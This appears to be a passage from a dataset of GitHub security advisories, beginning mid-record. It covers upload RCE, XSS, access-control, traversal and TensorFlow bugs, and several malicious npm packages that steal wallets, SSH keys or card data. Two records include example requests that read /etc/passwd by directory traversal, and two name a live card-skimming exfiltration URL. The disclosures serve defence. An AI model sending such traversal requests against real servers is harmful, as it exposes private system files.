'https://lists.apache.org/thread.html/r3539bd3a377991217d724879d239e16e86001c54160076408574e1da@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r3d20a2660b36551fd8257d479941782af4a7169582449fac1704bde2@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r428d068b2a4923f1a5a4f5fc6381b95205cfe7620169d16db78e9c71@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r446646c5588b10f5e02409ad580b12f314869009cdfbf844ca395cec@%3Cdev.ranger.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r46bebdeb59b8b7212d63a010ca445a9f5c4e9d64dcf693cab6f399d3@%3Ccommits.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r5d8bea8e9d17b6efcf4a0e4e194e91ef46a99f505777a31a60da2b38@%3Cdev.ranger.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r65ee95fa09c831843bac81eaa582fdddc2b6119912a72d1c83a9b882@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r6fdd4c61a09a0c89f581b4ddb3dc6f154ab0c705fcfd0a7358b2e4e5@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r7762d69e85c58d6948823424017ef4c08f47de077644277fa18cc116@%3Cdev.ranger.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r7e5c10534ed06bf805473ac85e8412fe3908a8fa4cabf5027bf11220@%3Cdev.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r8170007fd9b263d65b37d92a7b5d7bc357aedbb113a32838bc4a9485@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r8e96c340004b7898cad3204ea51280ef6e4b553a684e1452bf1b18b1@%3Cjira.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r94930e39b60fff236160c1c4110fe884dc093044b067aa5fc98d7ee1@%3Cdev.ranger.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r9e59ebaf76fd00b2fa3ff5ebf18fe075ca9f4376216612c696f76718@%3Cdev.ranger.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r9ecf211c22760b00967ebe158c6ed7dba9142078e2a630ab8904a5b7@%3Cdev.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/ra275f29615f35d5b40106d1582a41e5388b2a5131564e9e01a572987@%3Cdev.ranger.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rac5ee5d686818be7e7c430d35108ee01a88aae54f832d32f62431fd1@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb43f9a65150948a6bebd3cb77ee3e105d40db2820fd547528f4e7f89@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb5eedf90ba3633e171a2ffdfe484651c9490dc5df74c8a29244cbc0e@%3Ccommits.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb73708bf714ed6dbc1212da082e7703e586077f0c92f3940b2e82caf@%3Cdev.ranger.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb99c7321eba5d4c907beec46675d52827528b738cfafd48eb4d862f1@%3Cdev.tomee.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rc068e824654c4b8bd4f2490bec869e29edbfcd5dfe02d47cbf7433b2@%3Cdev.tomee.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rc717fd6c65190f4e592345713f9ef0723fb7d71f624caa2a17caa26a@%3Cdev.ranger.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rcc72b497e3dff2dc62ec9b89ceb90bc4e1b14fc56c3c252a6fcbb013@%3Cdev.ranger.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rdea588d4a0ebf9cb7ce8c3a8f18d0d306507c4f8ba178dd3d20207b8@%3Cdev.tomee.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rdf311f13e6356297e0ffe74397fdd25a3687b0a16e687c3ff5b834d8@%3Cdev.ranger.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rdf8d389271a291dde3b2f99c36918d6cb1e796958af626cc140fee23@%3Ccommits.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/re7326b8655eab931f2a9ce074fd9a1a51b5db11456bee9b48e1e170c@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/re8ae2670ec456ef1c5a2a661a2838ab2cd00e9efa1e88c069f546f21@%3Ccommits.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3Cissues.geode.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rf28ab6f224b48452afd567dfffb705fbda0fdbbf6535f6bc69d47e91@%3Cdev.ranger.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rfc1ccfe89332155b72ce17f13a2701d3e7b9ec213324ceb90e79a28a@%3Cdev.ranger.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2020/02/msg00020.html'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20200327-0002/'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2020.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2020.html'}, {'type': 'WEB', 'url': 'http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20200610-01-fastjason-en'}]","{'cwe_ids': ['CWE-502'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-02-25T20:56:51Z', 'nvd_published_at': '2020-02-10T21:56:00Z'}"
+1.4.0,GHSA-g9rq-x4fj-f5hx,2021-01-08T21:18:55Z,2020-03-13T20:21:27Z,,['CVE-2020-5256'],Remote Code Execution Through Image Uploads in BookStack,"### Impact
+
+A user could upload PHP files through image upload functions, which would allow them to execute code on the host system remotely. They would then have the permissions of the PHP process.
+
+This most impacts scenarios where non-trusted users are given permission to upload images in any area of the application.
+
+### Patches
+
+The issue was addressed in a series of patches: v0.25.3, v0.25.4 and v0.25.5.
+Users should upgrade to at least v0.25.5 to avoid this patch but ideally the latest BookStack version as previous versions are un-supported.
+
+### Workarounds
+
+Depending on BookStack version, you could use the [local_secure](https://www.bookstackapp.com/docs/admin/upload-config/#local-secure) image storage option, or use s3 or a similar compatible service.
+
+Preventing direct execution of any `php` files, apart from the `public/index.php` file, though web-server configuration would also prevent this.
+
+### References
+
+[BookStack Beta v0.25.3](https://github.com/BookStackApp/BookStack/releases/tag/v0.25.3)
+[BookStack Beta v0.25.4](https://github.com/BookStackApp/BookStack/releases/tag/v0.25.4)
+[BookStack Beta v0.25.5](https://github.com/BookStackApp/BookStack/releases/tag/v0.25.5)
+
+### For more information
+
+If you have any questions or comments about this advisory:
+* Open an issue in [the BookStack GitHub repository](BookStackApp/BookStack/issues).
+* Ask on the [BookStack Discord chat](https://discord.gg/ztkBqR2).
+* Follow the [BookStack Security advise](https://github.com/BookStackApp/BookStack#-security) to contact someone privately.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:L'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'ssddanbrown/bookstack'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.25.5'}]}], 'database_specific': {'last_known_affected_version_range': '< 0.25.3'}}]","[{'type': 'WEB', 'url': 'https://github.com/BookStackApp/BookStack/security/advisories/GHSA-g9rq-x4fj-f5hx'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-5256'}, {'type': 'WEB', 'url': 'https://github.com/BookStackApp/BookStack/releases/tag/v0.25.3'}, {'type': 'WEB', 'url': 'https://github.com/BookStackApp/BookStack/releases/tag/v0.25.4'}, {'type': 'WEB', 'url': 'https://github.com/BookStackApp/BookStack/releases/tag/v0.25.5'}]","{'cwe_ids': ['CWE-95'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-03-13T20:20:25Z', 'nvd_published_at': None}"
+1.4.0,GHSA-g4m9-5hpf-hx72,2021-01-14T17:48:29Z,2020-03-30T20:09:44Z,,['CVE-2020-5275'],Firewall configured with unanimous strategy was not actually unanimous in Symfony,"Description
+-----------
+
+On Symfony before 4.4.0, when a `Firewall` checks an access control rule (using the unanimous strategy), it iterates over all rule attributes and grant access only if *all* calls to the `accessDecisionManager` decide to grant access.
+
+As of Symfony 4.4.0, a bug was introduced that prevents the check of attributes as soon as `accessDecisionManager` decide to grant access on one attribute.
+
+Resolution
+----------
+
+The `accessDecisionManager` is now called with all attributes at once, allowing the unanimous strategy being applied on each attribute.
+
+The patch for this issue is available [here](https://github.com/symfony/symfony/commit/c935e4a3fba6cc2ab463a6ca382858068d63cebf) for the 4.4 branch.
+
+Credits
+-------
+
+I would like to thank Antonio J. García Lagar for reporting & Robin Chalas for fixing the issue.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'symfony/security'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.4.0'}, {'fixed': '4.4.7'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'symfony/security'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.0.0'}, {'fixed': '5.0.7'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'symfony/security-http'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.4.0'}, {'fixed': '4.4.7'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'symfony/security-http'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.0.0'}, {'fixed': '5.0.7'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/symfony/symfony/security/advisories/GHSA-g4m9-5hpf-hx72'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-5275'}, {'type': 'WEB', 'url': 'https://github.com/symfony/symfony/commit/c935e4a3fba6cc2ab463a6ca382858068d63cebf'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/C36JLPHUPKDFAX6D5WYFC4ALO2K7RDUQ/'}]","{'cwe_ids': ['CWE-285'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-03-30T19:45:26Z', 'nvd_published_at': None}"
+1.4.0,GHSA-hg79-j56m-fxgv,2021-10-01T20:15:16Z,2020-09-04T15:26:04Z,,[],Cross-Site Scripting in react,"Versions of `react` prior to 0.14.0 are vulnerable to Cross-Site Scripting (XSS). The package's `createElement` function fails to properly validate its input object, allowing attackers to execute arbitrary JavaScript in a victim's browser.
+
+
+## Recommendation
+
+Upgrade to version 0.14.0 or later.",[],"[{'package': {'ecosystem': 'npm', 'name': 'react'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.1'}, {'fixed': '0.14.0'}]}]}]","[{'type': 'PACKAGE', 'url': 'https://github.com/facebook/react'}, {'type': 'WEB', 'url': 'https://reactjs.org/blog/2015/10/07/react-v0.14.html#notable-enhancements'}, {'type': 'WEB', 'url': 'https://reactjs.org/blog/2019/10/22/react-release-channels.html#experimental-channel'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/npm:react:20150318'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1347'}, {'type': 'WEB', 'url': 'http://danlec.com/blog/xss-via-a-spoofed-react-element'}]","{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:55:53Z', 'nvd_published_at': None}"
+1.4.0,GHSA-c4hh-fg8x-6h9p,2021-09-29T21:04:32Z,2020-09-03T21:57:29Z,,[],Malicious Package in buffer-xnr,"Version 2.0.2 contained malicious code. The package targeted the Ethereum cryptocurrency and performed transactions to wallets not controlled by the user.
+
+
+## Recommendation
+
+Remove the package from your environment. Ensure no Ethereum funds were compromised.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'buffer-xnr'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1247'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:52:15Z', 'nvd_published_at': None}"
+1.4.0,GHSA-6343-m2qr-66gf,2021-09-30T17:14:57Z,2020-09-03T23:10:41Z,,[],Malicious Package in js-sja3,"Version 0.8.0 contained malicious code. The package targeted the Ethereum cryptocurrency and performed transactions to wallets not controlled by the user.
+
+
+## Recommendation
+
+Remove the package from your environment. Ensure no Ethereum funds were compromised.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'js-sja3'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1291'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:54:01Z', 'nvd_published_at': None}"
+1.4.0,GHSA-h26f-j4mv-84g7,2021-10-01T14:00:36Z,2020-09-02T18:39:43Z,,[],Malicious Package in asycn,"All versions of `asycn` typosquatted a popular package of similar name and tracked users who had installed the incorrect package. The package uploaded information to a remote server including: name of the downloaded package, name of the intended package, the Node version and whether the process was running as sudo. There is no further compromise.
+
+
+## Recommendation
+
+Remove the package from your dependencies and always ensure package names are typed correctly upon installation.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'asycn'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/846'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:37:57Z', 'nvd_published_at': None}"
+1.4.0,GHSA-725f-3pw7-rq6x,2021-09-29T20:46:52Z,2020-09-03T21:09:47Z,,[],Malicious Package in 8.9.4,"Versions 1.0.2, 1.0.3, 1.0.4 and 1.0.5 of `8.9.4` contain malicious code as a preinstall script. The package reads the system's SSH keys but does not upload it to a remote server.
+
+
+## Recommendation
+
+Remove the package from your environment. There is no evidence of further compromise at the moment.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': '8.9.4'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1201'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:50:57Z', 'nvd_published_at': None}"
+1.4.0,GHSA-jf55-rgpx-p6rx,2023-07-27T20:31:34Z,2020-09-03T19:12:22Z,,[],Malicious Package in iie-viz,"Version 1.0.4 of `iie-viz` contained malicious code. The code when executed in the browser would enumerate password, cvc, cardnumber fields from forms and send the extracted values to `https://js-metrics.com/minjs.php?pl=`
+
+
+
+## Recommendation
+
+Remove the package from your environment. It's also recommended to evaluate your application to determine whether or not user data was compromised.
+
+Users may consider downgrading to version 1.0.3",[],"[{'package': {'ecosystem': 'npm', 'name': 'iie-viz'}, 'versions': ['1.0.4']}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1103'}]","{'cwe_ids': [], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:47:21Z', 'nvd_published_at': None}"
+1.4.0,GHSA-g8rg-7rpr-cwr2,2021-08-02T14:33:59Z,2020-09-02T18:03:26Z,,['CVE-2020-25026'],Information Disclosure in TYPO3 extension sf_event_mgt,"A missing access check in the backend module allows an authenticated backend user to export participant data for events which the user does not have access to, resulting in Information Disclosure.
+
+Another missing access check in the backend module allows an authenticated backend user to send emails to event participants for events which the user does not have access to, resulting in Broken Access Control.
+
+External reference: [https://typo3.org/security/advisory/typo3-ext-sa-2020-017](https://typo3.org/security/advisory/typo3-ext-sa-2020-017)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'derhansen/sf_event_mgt'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.3.1'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'derhansen/sf_event_mgt'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.0.0'}, {'fixed': '5.1.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/derhansen/sf_event_mgt/security/advisories/GHSA-g8rg-7rpr-cwr2'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-25026'}, {'type': 'WEB', 'url': 'https://github.com/derhansen/sf_event_mgt/commit/17edcbf608b252cc1123e1279f0735f6aa28fef4'}, {'type': 'WEB', 'url': 'https://packagist.org/packages/derhansen/sf_event_mgt'}, {'type': 'WEB', 'url': 'https://typo3.org/help/security-advisories'}, {'type': 'WEB', 'url': 'https://typo3.org/security/advisory/typo3-ext-sa-2020-017'}]","{'cwe_ids': ['CWE-863'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-09-02T18:03:13Z', 'nvd_published_at': '2020-09-02T17:15:00Z'}"
+1.4.0,GHSA-pxq7-4ppw-qp7f,2023-09-07T00:04:57Z,2020-09-01T18:19:36Z,,['CVE-2017-16135'],Directory Traversal in serverzyy,"Affected versions of `serverzyy` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system.
+
+**Example request:**
+```http
+GET /../../../../../../../../../../etc/passwd HTTP/1.1
+host:foo
+```
+
+
+## Recommendation
+
+No patch is available for this vulnerability.
+
+It is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.",[],"[{'package': {'ecosystem': 'npm', 'name': 'serverzyy'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-16135'}, {'type': 'WEB', 'url': 'https://github.com/JacksonGL/NPM-Vuln-PoC/blob/master/directory-traversal/serverzyy'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/431'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:22:52Z', 'nvd_published_at': None}"
+1.4.0,GHSA-rwmv-c7v8-v9vf,2021-10-01T20:40:15Z,2020-09-04T16:36:45Z,,[],Malicious Package in bitcoimd-rpc,"All versions of this package contained malware. The package was designed to find and exfiltrate cryptocurrency wallets.
+
+
+## Recommendation
+
+Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
+
+The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'bitcoimd-rpc'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1363'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:56:29Z', 'nvd_published_at': None}"
+1.4.0,GHSA-9pr3-7449-977r,2020-08-31T18:36:31Z,2020-09-02T18:21:26Z,,[],Cross-Site Scripting in express-cart,"All versions of `harp` are vulnerable to Cross-Site Scripting. In the admin page it is possible to inject arbitrary JavaScript as a new product option, allowing attackers to execute arbitrary code. This is limited to the admin page and does not affect other pages.
+
+
+## Recommendation
+
+No fix is currently available. Consider using an alternative module until a fix is made available.
+",[],"[{'package': {'ecosystem': 'npm', 'name': 'express-cart'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}]}]}]","[{'type': 'WEB', 'url': 'https://hackerone.com/reports/395944'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/808'}]","{'cwe_ids': ['CWE-79'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:36:31Z', 'nvd_published_at': None}"
+1.4.0,GHSA-224h-p7p5-rh85,2021-09-23T21:43:28Z,2020-09-01T17:32:26Z,,[],Directory Traversal in wenluhong1,"Affected versions of `wenluhong1` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system.
+
+Example request:
+```
+GET /../../../../../../../../../../etc/passwd HTTP/1.1
+host:foo
+```
+
+
+## Recommendation
+
+No patch is available for this vulnerability.
+
+It is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'wenluhong1'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/JacksonGL/NPM-Vuln-PoC/blob/master/directory-traversal/wenluhong1'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/npm:wenluhong1:20170509'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/409'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:22:00Z', 'nvd_published_at': None}"
+1.4.0,GHSA-6m6m-j2hm-pxrg,2021-09-30T19:33:36Z,2020-09-03T17:37:05Z,,[],Malicious Package in cicada-render,"All versions of `cicada-render` contain malicious code. The package uploads system information to a remote server, downloads a file and executes it.
+
+
+## Recommendation
+
+Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
+
+The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'cicada-render'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1051'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:45:31Z', 'nvd_published_at': None}"
+1.4.0,GHSA-x9j7-x98r-r4w2,2021-08-26T15:19:30Z,2020-09-25T18:28:51Z,,['CVE-2020-15210'],Segmentation fault in tensorflow-lite,"### Impact
+If a TFLite saved model uses the same tensor as both input and output of an operator, then, depending on the operator, we can observe a segmentation fault or just memory corruption.
+
+### Patches
+We have patched the issue in d58c96946b and will release patch releases for all versions between 1.15 and 2.3.
+
+We recommend users to upgrade to TensorFlow 1.15.4, 2.0.3, 2.1.2, 2.2.1, or 2.3.1.
+
+### Workarounds
+A potential workaround would be to add a custom `Verifier` to the model loading code to ensure that no operator reuses tensors as both inputs and outputs. Care should be taken to check all types of inputs (i.e., constant or variable tensors as well as optional tensors).
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+### Attribution
+This vulnerability has been discovered from a variant analysis of [GHSA-cvpc-8phh-8f45](https://github.com/tensorflow/tensorflow/security/advisories/GHSA-cvpc-8phh-8f45).","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.15.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.0.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.1.0'}, {'fixed': '2.1.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.1'}]}], 'versions': ['2.2.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.1'}]}], 'versions': ['2.3.0']}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-x9j7-x98r-r4w2'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-15210'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/d58c96946b2880991d63d1dacacb32f0a4dfa453'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/releases/tag/v2.3.1'}, {'type': 'WEB', 'url': 'http://lists.opensuse.org/opensuse-security-announce/2020-10/msg00065.html'}]","{'cwe_ids': ['CWE-20', 'CWE-787'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-09-25T18:15:49Z', 'nvd_published_at': '2020-09-25T19:15:00Z'}"
+1.4.0,GHSA-46m8-42hm-wvvw,2021-09-23T21:33:00Z,2020-09-01T15:34:16Z,,['CVE-2016-1000231'],Cross-Site Scripting in emojione,"Affected versions of `emojione` are vulnerable to cross-site scripting when user input is passed into the `toShort()`, `shortnameToImage()`, `unicodeToImage()`, and `toImage()` functions.
+
+
+
+## Recommendation
+
+Update to version 1.3.1 or later.",[],"[{'package': {'ecosystem': 'npm', 'name': 'emojione'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.3.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.3.0'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2016-1000231'}, {'type': 'WEB', 'url': 'https://github.com/Ranks/emojione/issues/61'}, {'type': 'WEB', 'url': 'https://github.com/joypixels/emojione/commit/613079b16c00e47fb3c44744a67ed88a9295afb1'}, {'type': 'PACKAGE', 'url': 'https://github.com/Ranks/emojione/'}, {'type': 'WEB', 'url': 'https://github.com/joypixels/emojione/commits/v1.3.1/'}]","{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:11:50Z', 'nvd_published_at': None}"
+1.4.0,GHSA-3wh2-2pp3-2823,2023-07-27T00:02:26Z,2020-09-01T20:35:18Z,,[],Malicious Package in simple-alipay,"Version 1.0.1 of `simple-alipay` contained malicious code. The code when executed in the browser would enumerate password, cvc, cardnumber fields from forms and send the extracted values to `https://js-metrics.com/minjs.php?pl=`
+
+
+
+## Recommendation
+
+If version 1.0.1 of this module is found installed you will want to replace it with a version before or after 1.0.1. In addition to replacing the installed module, you will also want to evaluate your application to determine whether or not user data was compromised.
+
+Users may consider downgrading to version 1.0.0",[],"[{'package': {'ecosystem': 'npm', 'name': 'simple-alipay'}, 'versions': ['1.0.1']}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/637'}]","{'cwe_ids': [], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:30:49Z', 'nvd_published_at': None}"
